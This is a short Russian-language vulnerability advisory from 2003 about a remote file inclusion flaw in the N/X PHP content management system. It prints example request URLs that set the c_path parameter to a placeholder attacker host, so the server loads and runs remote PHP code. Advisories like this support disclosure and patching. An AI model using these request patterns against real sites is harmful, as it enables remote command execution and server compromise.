Выполнение произвольных команд в N/X
| Дата публикации: | 05.01.2003 |
| Всего просмотров: | 1137 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | N/X – система управления Web контентом, написанная на PHP. Требует MySQL и php4.
Обнаруженная уязвимость позволяет удаленному атакующему включать произвольные файлы, расположенные на удаленном сервере. Если удаленный файл - PHP сценарий, то атакующий может выполнять произвольные команды с привилегиями Web сервера. Пример:
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with : http://[attacker]/common/lib/launch.inc.php http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with : http://[attacker]/common/dbo/saveset.php http://[attacker]/common/dbo/recordset.php http://[attacker]/common/dbo/deleteset.php http://[attacker]/common/dbo/updateset.php http://[attacker]/common/dbo/insertset.phpУязвимость обнаружена в N/X 2002 PreRelease 1 |
| Ссылки: | N/X (PHP) |